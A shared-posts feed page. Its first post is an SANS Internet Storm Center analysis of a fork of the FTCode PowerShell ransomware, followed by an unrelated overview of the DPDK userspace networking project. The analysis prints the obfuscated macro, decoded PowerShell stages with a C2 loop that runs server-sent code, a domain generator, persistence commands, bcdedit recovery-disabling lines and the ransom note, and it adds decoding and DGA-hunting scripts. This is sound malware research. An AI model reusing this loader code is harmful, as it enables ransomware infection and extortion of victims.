Shared posts

06 Aug 08:19

A Fork of the FTCode Powershell Ransomware, (Thu, Aug 6th)

Yesterday, I found a new malicious PowerShell script that deserved to be analyzed due to the way it was dropped on the victim’s computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that it’s a fileless macro. The malicious Base64 code is stored in multiple environment variables that are concatenated and then executed through an IEX command:

Set osi = CreateObject("Wscript.shell")
Set wev = osi.Environment("Process")
wev("XXX0") = "JGVuY3J5cHQgPSAiNzY0OTJkMTExNjc0M2YwNDIzNDEzYjE2MDUwYTUzNDVNZ0I4QURFQVR3QXhBSElBYVFCRUFFMEFhQUJzQUZRQU1RQkxBSFF
BYUFCbEFFRUFjQUJ1QUdJQWFRQjRBSGNBUFFBOUFId0FaQUF6QURVQVlnQTJBR1VBTndBM0FERUFZUUEwQUdRQU1nQTNBR01BTmdCa0FEZ0FNZ0J
qQURjQVl3QXhBR1VBTWdBNUFEa0FNQUJtQUdRQU5BQTJBREFBTmdCaEFESUFOQUF6QUdFQU9RQmlBRElBTkFCakFHRUFNZ0JtQUdNQU1RQTNBRFl
BTXdBNUFEWUFNQUExQUdNQU9BQTJBR0lBWlFCbUFEZ0FPQUJsQURRQU9BQXhBR1FBTUFBNUFEZ0FaQUJqQURNQVlRQmxBRGdBT1FCbEFEWUFNd0J
sQURrQVl3QTNBREFBWkFBNEFEQUFNd0F4QURrQU13QmpBREFBWWdBekFETUFOd0F5QUdFQU5nQXlBRFFBTlFBeEFHVUFPQUF6QUdJQVpnQmpBR01
BWXdCaEFEQUFPUUJsQURjQU5nQTBBREFBTVFCbEFEa0FOd0F3QUdJQVl3QmtBRElBWkFBekFEZ0FNQUEzQUdZQU5RQXlBREVBWWdBNUFEQUFOd0J
oQURZQU5BQXlBRFVBTUFCbUFHRUFaQUEwQURBQU5nQTBBRElBWmdCaEFETUFNd0F4QUdJQVlRQTNBR01BTlFBeUFHVUFNZ0E1QURrQU9BQTRBR1V
BTndBMEFHWUFOQUJtQURRQU5BQTFBR1lBTXdCakFHSUFaUUEyQURnQVlnQTVBRFFBWmdCakFETUFOZ0JtQURFQVpRQXlBRE1BTUFBMEFEUUFaZ0E
1QUdRQVlnQTRBR1FBTlFBMUFHTUFZd0F4QURFQU1nQXdBRElBWVFBeUFEQUFOZ0JrQURRQU9RQTJBRElBWXdBM0FEY0FOd0JsQURrQVl3"
wev("XXX1") = "QTJBRE1BWmdCa0FHRUFaUUEwQUdJQU5BQTVBR0VBWXdBeUFHVUFPQUF5QURFQU1RQm1BREVBWkFCbEFHRUFZUUJqQURZQVlnQTBBRGtBWmdCaUF
ERUFNUUExQURjQU9RQTVBR0lBWkFCa0FEWUFNQUExQURNQVl3QTBBRE1BTXdCa0FHUUFNUUE0QUdFQVl3QmlBR1FBTkFCbUFEUUFOd0EwQURrQU5
RQXlBRElBWVFCaEFEZ0FPUUJsQURFQU5RQTNBRElBTVFBeEFEZ0FaUUJsQURrQU5BQTRBR1lBWmdBekFHRUFOUUJqQURZQU53QTFBREVBTWdBMkF
EZ0FNd0JsQUdFQU5BQmpBRE1BTUFBMEFHUUFaZ0EwQURjQU9RQXpBRE1BTVFBNEFHRUFaZ0E1QURrQU53QmlBRGNBTUFCaEFETUFNd0ExQURRQVp
BQTRBR1FBWkFBNUFHUUFOZ0F5QUdFQU1BQXdBR1FBWVFCbEFHUUFNUUF3QUdNQU53QTRBRFFBWlFBd0FEZ0FZUUF6QUdNQU9RQXdBRElBWkFBeEF
EQUFOUUEzQURRQU5RQmlBR0VBWmdCaEFHWUFPQUJqQUdFQU5nQmpBRE1BTkFCaEFEVUFOd0JsQURFQU1nQTVBR1lBWVFCbEFEWUFNd0F4QURrQVp
BQTFBR0VBTVFBMUFHSUFaQUJtQURJQU53QTRBRFVBWlFCaUFHRUFaQUJtQUdZQVl3QTRBREFBWmdBMkFHWUFaQUJsQURNQVpRQmhBRFlBTlFCaEF
EVUFaUUEyQURZQU9RQTJBRGdBWlFBMUFETUFNQUF3QURVQU1nQTRBRGtBWVFBeEFEVUFNUUE0QUdJQVlnQTRBREFBWWdCaEFHTUFaZ0EwQURrQU1
RQmlBRFFBTkFBNUFEVUFaZ0JqQURrQVlRQXlBR1lBTkFBNEFESUFOd0EzQURrQU5nQTJBRFVBWXdCbEFEQUFNUUJsQURFQU1nQmpBRGtB"

Up to 274 chunks of similar data are created and concatenated to generate the Base64 payload:

wev("XXX274") = "VGV4dElucHV0ICRlbmNyeXB0OwpoZWkgJERlY3J5cHRlZERhdGE="
XXX = "$env:XXX0+$env:XXX1+$env:XXX2+$env:XXX3+$env:XXX4+$env:XXX5+$env:XXX6+$env:XXX7+$env:XXX8+$env:XXX9+$env:XXX10+
$env:XXX11+$env:XXX12+$env:XXX13+$env:XXX14+$env:XXX15+$env:XXX16+$env:XXX17+$env:XXX18+$env:XXX19+$env:XXX20+$e
nv:XXX21+$env:XXX22+$env:XXX23+$env:XXX24+$env:XXX25+$env:XXX26+$env:XXX27+$env:XXX28+$env:XXX29+$env:XXX30+$env
:XXX31+$env:XXX32+$env:XXX33+$env:XXX34+$env:XXX35+$env:XXX36+$env:XXX37+$env:XXX38+$env:XXX39+$env:XXX40+$env:X
XX41+$env:XXX42+$env:XXX43+$env:XXX44+$env:XXX45+$env:XXX46+$env:XXX47+$env:XXX48+$env:XXX49+$env:XXX50+$env:XXX
51+$env:XXX52+$env:XXX53+$env:XXX54+$env:XXX55+$env:XXX56+$env:XXX57+$env:XXX58+$env:XXX59+$env:XXX60+$env:XXX61
+$env:XXX62+$env:XXX63+$env:XXX64+$env:XXX65+$env:XXX66+$env:XXX67+$env:XXX68+$env:XXX69+$env:XXX70+$env:XXX71+$
env:XXX72+$env:XXX73+$env:XXX74+$env:XXX75+$env:XXX76+$env:XXX77+$env:XXX78+$env:XXX79+$env:XXX80+$env:XXX81+$en
v:XXX82+$env:XXX83+$env:XXX84+$env:XXX85+$env:XXX86+$env:XXX87+$env:XXX88+$env:XXX89+$env:XXX90+$env:XXX91+$env:
XXX92"
...
osi.Run "powershell -noexit -c " & Chr(34) & "IeX ([System.Text.Encoding]::Unicode.GetString([system.Convert]::FromBase64String(" & XXX & ")));" & Chr(34), 1, True

Once the Base64 is extracted and decoded, we have the first payload:

$encrypt = 
"76492d1116743f0423413b16050a5345MgB8ADEATwAxAHIAaQBEAE0AaABsAFQAMQBLAHQAaABlAEEAcABuAGIAaQB4AHcAPQA9AHwAZAAzADU
AYgA2AGUANwA3ADEAYQA0AGQAMgA3AGMANgBkADgAMgBjADcAYwAxAGUAMgA5ADkAMABmAGQANAA2ADAANgBhADIANAAzAGEAOQBiADIANABjAGE
AMgBmAGMAMQA3ADYAMwA5ADYAMAA1AGMAOAA2AGIAZQBmADgAOABlADQAOAAxAGQAMAA5ADgAZABjADMAYQBlADgAOQBlADYAMwBlADkAYwA3ADA
AZAA4ADAAMwAxADkAMwBjADAAYgAzADMANwAyAGEANgAyADQANQAxAGUAOAAzAGIAZgBjAGMAYwBhADAAOQBlADcANgA0ADAAMQBlADkANwAwAGI
AYwBkADIAZAAzADgAMAA3AGYANQAyADEAYgA5ADAANwBhADYANAAyADUAMABmAGEAZAA0ADAANgA0ADIAZgBhADMAMwAxAGIAYQA3AGMANQAyAGU
AMgA5ADkAOAA4AGUANwA0AGYANABmADQANAA1AGYAMwBjAGIAZQA2ADgAYgA5ADQAZgBjADMANgBmADEAZQAyADMAMAA0ADQAZgA5AGQAYgA4AGQ
ANQA1AGMAYwAxADEAMgAwADIAYQAyADAANgBkADQAOQA2ADIAYwA3ADcANwBlADkAYwA2ADMAZgBkAGEAZQA0AGIANAA5AGEAYwAyAGUAOAAyADE
AMQBmADEAZABlAGEAYQBjADYAYgA0ADkAZgBiADEAMQA1ADcAOQA5AGIAZABkADYAMAA1ADMAYwA0ADMAMwBkAGQAMQA4AGEAYwBiAGQANABmADQ
ANwA0ADkANQAyADIAYQBhADgAOQBlADEANQA3ADIAMQAxADgAZQBlADkANAA4AGYAZgAzAGEANQBjADYANwA1ADEAMgA2ADgAMwBlAGEANABjADM
AMAA0AGQAZgA0ADcAOQAzADMAMQA4AGEAZgA5ADkANwBiADcAMABhADMAMwA1ADQAZAA4AGQAZAA5AGQANgAyAGEAMAAwAGQAYQBlAGQAMQAwAGM
ANwA4ADQAZQAwADgAYQAzAGMAOQAwADIAZAAxADAANQA3ADQANQBiAGEAZgBhAGYAOABjAGEANgBjADMANABhADUANwBlADEAMgA5AGYAYQBlADY
AMwAxADkAZAA1AGEAMQA1AGIAZABmADIANwA4ADUAZQBiAGEAZABmAGYAYwA4ADAAZgA2AGYAZABlADMAZQBhADYANQBhADUAZQA2ADYAOQA2ADg
AZQA1ADMAMAAwADUAMgA4ADkAYQAxADUAMQA4AGIAYgA4ADAAYgBhAGMAZgA0ADkAMQBiADQANAA5ADUAZgBjADkAYQAyAGYANAA4ADIANwA3ADk
ANgA2ADUAYwBlADAAMQBlADEAMgBjADkANgAzADIAMwBlADAAYwBhAGIANgBlAGIAYQAzADIAZAA4ADEAYQA5ADUANQAwAGMANwAwADMAZABmADg
AZAA2ADQAZQA0AGYAZgBhADQAMQAxADIANQAzAGQAZAA2AGMAMwAyADEAOQA4AGMAMwBkAGIAYwAzADcAYwAxADEAYgA0AGEANAA4AGIANAA4ADA
AZAA1ADYANAA2AGMAZQAyADgAZAAzADAAOQBjADYAOABhAGMAOQA1ADEAMwBlADIAZQBiAGYAYwBlAGQANQBiAGYA..."

function hei($encrypt){
  $sipped = [system.Convert]::FromBase64String($encrypt);
  $unsipped = gdba($sipped);
  $sclipt = [System.Text.Encoding]::Unicode.GetString($unsipped);
  iex($sclipt);
}

Function Set-SecretKey {
  [CmdletBinding()]
  Param
  (
    [string]$Key
  )
  #Get key length.
  $Length = $Key.Length;  
  #Pad length.
  $Pad = 32-$Length;   
  #If the length is less than 16 or more than 32.
  If(($Length -lt 16) -or ($Length -gt 32))
  {
    #Throw exception.
    Throw "String must be between 16 and 32 characters";
  }   
  #Create a new ASCII encoding object.
  $Encoding = New-Object System.Text.ASCIIEncoding;
  #Get byte array.
  $Bytes = $Encoding.GetBytes($Key + "0" * $Pad)
  #Return byte array.
  Return $Bytes;
}
 
Function Get-EncryptedData {
  [CmdletBinding()]
  Param
  (
    $Key,
    $TextInput
  )
  #Decrypt the text input with the secret key.
  $Result = $TextInput | ConvertTo-SecureString -Key $Key | ForEach-Object {
 [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))};
  #Return the decrypted data.
  Return $Result;
}
 
$Key = Set-SecretKey -Key "YRTWHTRJUUYUYRKB";
$DecryptedData = Get-EncryptedData -Key $Key -TextInput $encrypt;
hei $DecryptedData

The second payload is decrypted and, again, passed to Invoke-Expression ("IEX"). This gives us another blob of Base64-encoded data. Let's go deeper and decode it, this time to discover some VBS code. The obfuscation technique used is simple but effective:

xatu = ""
gfjbx = 0
Sub tghyu
ivhze -370
ivhze -371
ivhze -363
ivhze -381
ivhze -368
...
ivhze -450
ivhze -446
ivhze -385
ivhze -423

End Sub
Function ivhze (suas)
  xatu = xatu + ( vazey( suas + vxiwh  ) )
End Function
Function vazey (suas)
  vazey = Replace(ejtva, "aiyh,", "vizta") + ( Chr(suas) ) + ""
End Function
  ejtva = ""
  vxiwh = 482
  tghyu
  CreateObject("WScript.Shell").Run xatu, gfjbx

You can spot the trick: the next payload is decoded, via ivhze(), one character at a time, appended to the 'xatu' variable and finally executed. Here is the deobfuscated code:

powershell -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 
'JGF6YWp1emRkID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkYXphanV6ZGQpKSB7IG1kICRhemFqdXp
kZDsgfQokZHphanRhamFpID0gJGF6YWp1emRkICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLnZicyI7CiR5ZmZ1YWd6aXQgID0gIjEwMTQuMiI
7CiRieWFoeWpzaWIgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR0dXlidWF1eGZzICA9ICRhemFqdXpkZCArICJcdGh1bWJjYWNoZV8
2NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRmYWJ4d3h1YyA9ICJ3IjsKCmZ1bmN0aW9uIGlhbXdvcmsyeyBzYyAtUGF0aCAkYnlhaHlqc2l
iIC1WYWx1ZSAkKEdldC1EYXRlKTsgfTsKZnVuY3Rpb24gY3l4anVkZyggJHR1eXlzdWJzeSApewogIGlmKCAkdHV5eXN1YnN5IC1tYXRjaCAnT3V
...
zZTsKICBpZiggJGZmc2dlaXVkeGMubGVuZ3RoIC1uZSAxNiAgKXsgJHR3Ynh2dGJ6dHYsICRmZnNnZWl1ZHhjID0gIGJiYXp4YXp1ICR0cnVlOyB
9Cn1lbHNlewogICR0d2J4dnRienR2LCAkZmZzZ2VpdWR4YyA9ICBiYmF6eGF6dSAkdHJ1ZTsKfQokbXl1cmxwb3N0ID0gd2ZheHZ6ZDsKd2hpbGU
oICRmYWJ4d3h1YyApewogIGlhbXdvcmsyOwogIHRyeXsKICAgIGlmKCAkZmFieHd4dWMgLWFuZCAoJGZhYnh3eHVjLmxlbmd0aCAtZ3QgMzApICA
pewogICAgICBpZXggJGZhYnh3eHVjOwogICAgfTsKICB9Y2F0Y2h7IGN5eGp1ZGcgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7IH07CiAgU3RhcnQtU2x
lZXAgLXMgMjgwOwogICRmYWJ4d3h1YyA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGJ5YWh5anNpYiAtRm9yY2U7Cg==' ) );iex $a;
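
The character-offset decoding done by ivhze() can be reproduced statically, without running the dropper. The following Python is an added example, not part of the original diary; the function names are assumptions, and the embedded sample contains only the calls visible in the VBS listing above (the elided middle is left out).

```python
import re

# Constructed sample: the VBS dropper as listed above, restricted to the
# calls the article shows (the middle of the list is elided there).
SAMPLE_VBS = r'''xatu = ""
gfjbx = 0
Sub tghyu
ivhze -370
ivhze -371
ivhze -363
ivhze -381
ivhze -368
ivhze -450
ivhze -446
ivhze -385
ivhze -423

End Sub
Function ivhze (suas)
  xatu = xatu + ( vazey( suas + vxiwh  ) )
End Function
Function vazey (suas)
  vazey = Replace(ejtva, "aiyh,", "vizta") + ( Chr(suas) ) + ""
End Function
  ejtva = ""
  vxiwh = 482
  tghyu
  CreateObject("WScript.Shell").Run xatu, gfjbx
'''

# Function <name> (<param>) ... End Function
FUNC_RE = re.compile(
    r"^[ \t]*Function[ \t]+(\w+)[ \t]*\((\w+)\)(.*?)^[ \t]*End Function",
    re.I | re.M | re.S)


def find_decoder(src):
    """Return (function name, offset) for the routine that shifts its argument."""
    for name, param, body in FUNC_RE.findall(src):
        # Look for "<param> + <variable>" inside the function body.
        shifted = re.search(
            rf"\b{re.escape(param)}[ \t]*\+[ \t]*([A-Za-z_]\w*)", body)
        if not shifted:
            continue
        # Resolve the variable to the integer constant assigned to it.
        key = re.search(
            rf"^[ \t]*{re.escape(shifted.group(1))}[ \t]*=[ \t]*(-?\d+)[ \t]*$",
            src, re.I | re.M)
        if key:
            return name, int(key.group(1))
    raise ValueError("no offset-based decoder function found")


def decode(src):
    """Rebuild the string the script would hand to WScript.Shell.Run."""
    name, offset = find_decoder(src)
    calls = re.findall(
        rf"^[ \t]*{re.escape(name)}[ \t]+(-?\d+)[ \t]*$", src, re.I | re.M)
    out = []
    for arg in calls:
        code = int(arg) + offset
        if not 0 <= code <= 255:  # VBScript Chr() only accepts 0-255
            raise ValueError(f"argument {arg} decodes outside the Chr() range")
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    print(decode(SAMPLE_VBS))
```

On the visible calls this yields the first and last characters of the command line shown above ("power" and " $a;").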

Yes, again, a PowerShell script with more Base64-encoded data! Here is the decoded script:

$azajuzdd = $env:PUBLIC + "\Libraries"
if (-not (Test-Path $azajuzdd)) { md $azajuzdd; }
$dzajtajai = $azajuzdd + "\WindowsIndexingService.vbs";
$yffuagzit  = "1014.2";
$byahyjsib = $env:temp + "\AFX50058.tmp";
$tuybuauxfs  = $azajuzdd + "\thumbcache_64.db";
$myurlpost = $false;
$fabxwxuc = "w";

function iamwork2{ sc -Path $byahyjsib -Value $(Get-Date); };
function cyxjudg( $tuyysubsy ){
  if( $tuyysubsy -match 'OutOfMemoryException' ){
    ri -Path $byahyjsib -Force;
    get-process powershell* | stop-process;
    exit;
  };
}

function sendpost2( $tuyysubsy ){
  if( !$myurlpost ){ return $false; };
  $sfyzgbw = New-Object System.Net.WebClient;
  $sfyzgbw.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
  $sfyzgbw.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  $sfyzgbw.Encoding = [System.Text.Encoding]::UTF8;
  try{
    $wabhxji = $sfyzgbw.UploadString( $myurlpost, "l="+[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( "v=$yffuagzit&guid=$twbxvtbztv&" + $tuyysubsy ) ) ) );
    $wabhxji = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $wabhxji ) );
    if( !$fabxwxuc ){ return $false; }
    if( $ffsgeiudxc -eq $wabhxji.Substring(0,16) ){
      return $wabhxji.Substring(16,$wabhxji.length-16) ;
    }else{
      $fabxwxuc = $false;
      sendpost2 ("error=" + [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $wabhxji ) ) );
    }
  }catch{
    cyxjudg $_.Exception.Message;
    $fabxwxuc = $false;
    $sfyzgbw.UploadString( $myurlpost, "l="+[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( "v=$yffuagzit&guid=$twbxvtbztv&error=sendpost2:" + $myurlpost+":"+$wabhxji +":"+ $_.Exception.Message ) ) ) );
  };
  return $false;
};

function wfaxvzd( $idtutvas ){
  $hzveitdjuj = "hxxp://cdn[.]danielrmurray[.]com/";
  "hee","xu1","hs0","jd5","mqf" | %{ $hzveitdjuj += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $hzveitdjuj.split(",") | %{
    if( !$myurlpost ){
      $myurlpost = $_;
      if( !(sendpost2 ($idtutvas + "&domen=$myurlpost" )) ){ $myurlpost = $false; };
      Start-Sleep -s 5;
    }
  };
  if( $idtutvas -match "status=register" ){
    return "ok";
  }else{
    return $myurlpost;
  } 
};

if ( Test-Path $byahyjsib ){
  if ( ( ( NEW-TIMESPAN -Start ((Get-ChildItem $byahyjsib ).CreationTime) -End (Get-Date)).Minutes ) -gt 15 ){
    ri -Path $byahyjsib -Force;
    try{ get-process powershell* | stop-process }catch{};
    exit;
  }else{ exit; };
};

function bbazxazu( $uhzghaygf ){
  if( $uhzghaygf ){
    sc -Path $tuybuauxfs -Value ( [guid]::NewGuid(), ( [guid]::NewGuid() -replace '-','' ).Substring(0,16)  -join ',' ) -Force;  
    gi $tuybuauxfs -Force |  %{ $_.Attributes = "Hidden" };
    try{
      $xbgeechhvd = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk';
      if( -not ( Test-Path $xbgeechhvd ) ){
        $awugjdzsz = New-Object -ComObject ('WScript.Shell');
        $fzxwzjvv = $awugjdzsz.CreateShortcut( $xbgeechhvd  );
        $fzxwzjvv.TargetPath = $dzajtajai;
        $fzxwzjvv.WorkingDirectory = $azajuzdd;
        $fzxwzjvv.WindowStyle = 1;
        $fzxwzjvv.Description = 'Windows Application Service';
        $fzxwzjvv.Save();
      }
    }catch{};
    $twbxvtbztv, $ffsgeiudxc = (get-content $tuybuauxfs).split(',');
    $gdigfeyf = "status=register&ssid=$ffsgeiudxc&os="+([string]$PSVersionTable.BuildVersion)+"&psver="+( ( (Get-Host).Version ).Major )+ "&comp_name=" + ((Get-WmiObject -class Win32_ComputerSystem -Property Name).Name.trim() );
    if( Test-Path ( $azajuzdd + "\thumbcache_33.db" ) ){
      ri -Path ( $azajuzdd + "\thumbcache_33.db" ), ( $azajuzdd + "\WindowsIndexingService.js" ) -Force;
      try{ schtasks.exe /delete /TN "WindowsIndexingService" /f }catch{}
      try{ schtasks.exe /delete /TN "Windows Indexing Service" /f }catch{}
      if( Test-Path ( [Environment]::GetFolderPath('Startup') + '\WindowsIndexingService.lnk' )  ){
        ri -Path ( [Environment]::GetFolderPath('Startup') + '\WindowsIndexingService.lnk' ) -Force;
      }
    }
    $wccgavfse = wfaxvzd $gdigfeyf;
    if( $wccgavfse -ne "ok"){
      ri -Path $tuybuauxfs -Force;
      exit;
    }
  }
  return (get-content $tuybuauxfs).split(',');
}
$ijhtvxyi = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR $dzajtajai); 
if ( Test-Path $tuybuauxfs ){
  $twbxvtbztv, $ffsgeiudxc =  bbazxazu $false;
  if( $ffsgeiudxc.length -ne 16  ){ $twbxvtbztv, $ffsgeiudxc =  bbazxazu $true; }
}else{
  $twbxvtbztv, $ffsgeiudxc =  bbazxazu $true;
}
$myurlpost = wfaxvzd;
while( $fabxwxuc ){
  iamwork2;
  try{
    if( $fabxwxuc -and ($fabxwxuc.length -gt 30)  ){
      iex $fabxwxuc;
    };
  }catch{ cyxjudg $_.Exception.Message; };
  Start-Sleep -s 280;
  $fabxwxuc = sendpost2;
};
ri -Path $byahyjsib -Force;

This script is stored in:

$vuzyfjvdhd = $env:PUBLIC + "\Libraries";
if (-not (Test-Path $vuzyfjvdhd)) { md $vuzyfjvdhd; }
$tcfshdx = $vuzyfjvdhd + "\WindowsIndexingService.vbs";

And persistence is added through a scheduled task:

schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR $tcfshdx
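
The fallback hosts built in the wfaxvzd function of the decoded script are derived from the date, so they can be precomputed for blocklists or retrospective DNS searches. The following Python is an added example, not part of the original diary; the log line format, the function names and the treatment of the %V week value are assumptions.

```python
import base64
import calendar
from datetime import date

# Seeds and TLD copied from the wfaxvzd function in the decoded script.
SEEDS = ("hee", "xu1", "hs0", "jd5", "mqf")
TLD = ".top"


def dga_domain(seed, stamp):
    """Base64-encode seed + stamp (UTF-8), lowercase it, append the TLD."""
    raw = (seed + stamp).encode("utf-8")
    return base64.b64encode(raw).decode("ascii").lower() + TLD


def week_strings(year, month):
    """Every week value %V could produce for a day in the given month.

    Assumption: the result of Get-Date -UFormat %V depends on the PowerShell
    version, so both the ISO 8601 week and the simple
    (day_of_year - 1) // 7 + 1 count are covered, with and without zero
    padding. An unpadded single-digit week gives an 8-byte input, so the
    resulting label ends in '='.
    """
    weeks = set()
    for day in range(1, calendar.monthrange(year, month)[1] + 1):
        d = date(year, month, day)
        iso_week = d.isocalendar()[1]
        simple_week = (d.timetuple().tm_yday - 1) // 7 + 1
        for week in (iso_week, simple_week):
            weeks.update({str(week), f"{week:02d}"})
    return weeks


def candidate_domains(year, month):
    """All domains the script could try during the given month."""
    prefix = f"{year % 100:02d}{month:02d}"  # %y%m
    return {dga_domain(seed, prefix + week)
            for seed in SEEDS
            for week in week_strings(year, month)}


def hunt(log_lines, year, month):
    """Return (client, domain) pairs whose queried name is a candidate.

    Expects lines of the form "<timestamp> <client> <qname> <qtype>".
    """
    candidates = candidate_domains(year, month)
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # skip malformed lines
        qname = fields[2].rstrip(".").lower()
        if qname in candidates:
            hits.append((fields[1], qname))
    return hits


# Constructed resolver log lines (not taken from the article).
SAMPLE_LOG = [
    "2020-08-06T08:19:02Z 10.0.0.12 www.example.org. A",
    "2020-08-06T08:19:07Z 10.0.0.12 agvlmjawodmy.top. A",
    "2020-08-06T08:19:12Z 10.0.0.40 AGVLMJAWODMY.TOP A",
    "truncated line",
]

if __name__ == "__main__":
    for client, domain in hunt(SAMPLE_LOG, 2020, 8):
        print(client, domain)
```

The hard-coded first-choice host in the script is not date-derived and has to be added to any blocklist separately.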

After a quick analysis, the malicious code is a ransomware. I checked deeper and found a lot of code similarities with the FTCODE ransomware[1] that was first spotted in 2013!

Here is the notice found in the PowerShell code:

<h1>All your files was encrypted!</h1>
<h2  style='color:red'><b>Yes, You can Decrypt Files Encrypted!!!</b></h2>
<p>Your personal ID: <b>%guid%</b></p>
<p>1. Download Tor browser - <a href='https://www.torproject.org/download/'>https://www.torproject.org/download/</a></p>
<p>2. Install Tor browser</p>
<p>3. Open Tor Browser</p>
<p>4. Open link in TOR browser:  <b>http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=%guid%</b></p>
<p>5. Follow the instructions on this page</p>
<h2>***** Warning*****</h2>
<p>Do not rename files</p>
<p>Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)</p>
<p>As evidence, we can for free back one file</p>
<p>Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.</p>

What is different than the good old FTCODE? The extension of encrypted files is generated dynamically:

$cwteiht = ([string][guid]::NewGuid()).Substring(0,6);
...
$bcbyfiwf = $_.Name+".$cwteiht";             
try{ 
  ren -Path $($_.FullName) -NewName $bcbyfiwf -Force; 
}

Also, the malware author commented out some pieces of code (why not just delete the unwanted lines?):

<#    
$tusdweaeu = uyzicich ("guid=$auiduddy&ext=$cwteiht&ek=$ifsxfwbi&r0=" + ([uri]::EscapeDataString($fsxbxad)) + "&s0=" + ([uri]::EscapeDataString($wcaebjz)) +"&");   
if( $tusdweaeu ){     
  sc -Path $yhfcdgjwz -Value $(Get-Date);   
}
else{      
  ri -Path $yhfcdgjwz -Force;     
  exit;   
}   
#>   
...
<#
xfttjicedt('bcdedit /set wxcvuhgv bootstatuspolicy ignoreallfailures');   
xfttjicedt('bcdedit /set wxcvuhgv recoveryenabled no');
#>   

The initial script still has a nice VT score (4/57)! [2] The ransomware in itself is not new, but the path used to deliver it was interesting.

[1] https://www.bleepingcomputer.com/news/security/ftcode-powershell-ransomware-resurfaces-in-spam-campaign/
[2] https://www.virustotal.com/gui/file/730a1230f26b06666c983eaae92577fe4c6e4a00179851e0f6b459f2e3839092/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
23 Apr 13:07

Userspace Networking with DPDK

by Rami Rosen
Rami Rosen Mon, 04/23/2018 - 07:07

DPDK is a fully open-source project that operates in userspace. It's a multi-vendor and multi-architecture project, and it aims at achieving high I/O performance and reaching high packet processing rates, which are some of the most important features in the networking arena. It was created by Intel in 2010 and moved to the Linux Foundation in April 2017. This move positioned it as one of the most dominant and most important open-source Linux projects. DPDK was created for the telecom/datacom infrastructure, but today, it's used almost everywhere, including the cloud, data centers, appliances, containers and more. In this article, I present a high-level overview of the project and discuss features that were released in DPDK 17.08 (August 2017).

Undoubtedly, a lot of effort in many networking projects is geared toward achieving high speed and high performance. Several factors contribute to achieving this goal with DPDK. One is that DPDK is a userspace application that bypasses the heavy layers of the Linux kernel networking stack and talks directly to the network hardware. Another factor is usage of memory hugepages. By using hugepages (of 2MB or 1GB in size), a smaller number of memory pages is needed than when using standard memory pages (which in many platforms are 4KB in size). As a result, the number of Translation Lookaside Buffer (TLB) misses is reduced significantly, and performance is increased. Yet another factor is that low-level optimizations are done in the code, some of them related to memory cache line alignment, aiming at achieving optimal cache use, prefetching and so on. (Delving into the technical details of those optimizations is outside the scope of this article.)

DPDK has gained popularity in recent years, and it's used in many open-source projects. Many Linux distributions (Fedora, Ubuntu and others) have included DPDK support in their packaging systems as well.

The core DPDK ingredients are libraries and drivers, also known as Poll Mode Drivers (PMDs). There are more than 35 libraries at the time of this writing. These libraries abstract away the low-level implementation details, which provides flexibility as each vendor implements its own low-level layers.

The DPDK Development Model

DPDK is written mostly in C, but the project also has a few tools that are written in Python. All code contributions to DPDK are done by patches sent and discussed over the dpdk-dev mailing list. Patches aiming at getting feedback first are usually titled RFCs (Request For Comments). In order to keep the code as stable as possible, the preference is to preserve the ABI (Application Binary Interface) whenever possible. When it seems that there's no other choice, developers should follow a strict ABI deprecation process, including announcement of the requested ABI changes over the dpdk-dev mailing list ahead of time. The ABI changes that are approved and merged are documented in the Release Notes. When acceptance of new features is in doubt, but the respective patches are merged into the master tree anyway, they are tagged as "EXPERIMENTAL". This means that those patches may be changed or even could be removed without prior notice. Thus, for example, new rte_bus experimental APIs were added in DPDK 17.08. I also should note that usually whenever patches for a new, generic API (which should support multiple hardware devices from different vendors) are sent over the mailing list, it's expected that at least one hardware device that supports the new feature is available on the market (if the device is merely announced and not available, developers can't test it).

There's a technical board of nine members from various companies (Intel, NXP, 6WIND, Cavium and others). Meetings typically are held every two weeks over IRC, and the minutes of those meetings are posted on the dpdk-dev mailing list.

As with other large open-source projects, there are community-driven DPDK events across the globe on a regular basis every year. First, there are various DPDK Summits. Among them, DPDK Summit Userspace is focused on being more interactive and on getting feedback from the community. There also are several DPDK meetups in different locations around the world. Moreover, from time to time there is an online community survey, announced over the dpdk-dev mailing list, in order to get feedback from the community, and everyone can participate in it.

The DPDK website hosts the master DPDK repo, but several other repos are dedicated to new features. Several tools and utilities exist in the DPDK tree, among them the dpdk-devbind.py script, which is for associating a network device or a crypto device with DPDK, and testpmd, which is a CLI tool for various tasks, such as forwarding, monitoring statistics and more. There are almost 50 sample applications under the "examples" folder, bundled with full detailed documentation.

